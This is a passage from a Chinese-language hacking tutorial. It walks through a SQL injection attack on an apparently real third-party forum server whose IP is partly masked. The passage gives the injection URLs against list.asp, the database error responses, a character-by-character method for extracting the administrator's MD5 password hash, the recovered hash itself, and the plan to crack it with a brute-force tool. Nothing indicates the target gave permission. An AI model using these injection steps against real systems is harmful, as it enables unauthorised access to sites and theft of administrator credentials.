下面的目标就是要得到管理员的用户名和密码了。

　　提交：

　　http://211.***.***.116/list.asp?l_id=1 and exists (select admin from admin where

　　admin=admin)

　　返回：

　　Microsoft OLE DB Provider for ODBC Drivers 错误 '80004005'

　　[Microsoft][ODBC Microsoft Access Driver] 操作必须使用一个可更新的查询。

　　/list.asp，行145

　　看来连管理员的用户名都还是默认的admin。

　　那么，密码是不是也是默认的admin呢，想到这里我返回到论坛的首页用用户名admin密码admin登陆，结果失败！看来还是老老实实的猜测password的值吧！

　　提交：

　　http://211.***.***.116/list.asp?l_id=1 and exists (select password from admin where left

　　(password,1)='a')

　　返回的是一个报告出错的页面，这点告诉我们由MD5加密后的密码的第一位不是'a'。

　　注：由MD5加密后的密码长度为16位，每一位是一个16进制数，所以理论上最多猜测256次即可得到该值

　　当提交：

　　http://211.***.***.116/list.asp?l_id=1 and exists (select password from admin where left

　　(password,1)='1')

　　返回：

　　Microsoft OLE DB Provider for ODBC Drivers 错误 '80004005'

　　[Microsoft][ODBC Microsoft Access Driver] 操作必须使用一个可更新的查询。

　　/list.asp，行145

　　可以得知第一位是'1'。

　　同理可以依次得到每一位的值，最终经过耐心的尝试得到'19a7e9898008f09e'。这一步可能会耗费一些时间，当然也可以通过编写一个脚本来实现自动获取的目的。

　　好了，现在该轮到MD5的“暴破”专家DeMd5出场了，填入刚刚得到的'19a7e9898008f09e'，下面就可以喝杯咖啡然后等着密码来找你吧！

　　那么难道在密码没有破解出来之前就只有等待么？当然是否定的，我可不想指望着DeMD5能给我一个满意的答案，万一这个管理员用了十几位的数字、大小写字母和符号来组成他的密码，那岂不是惨了？！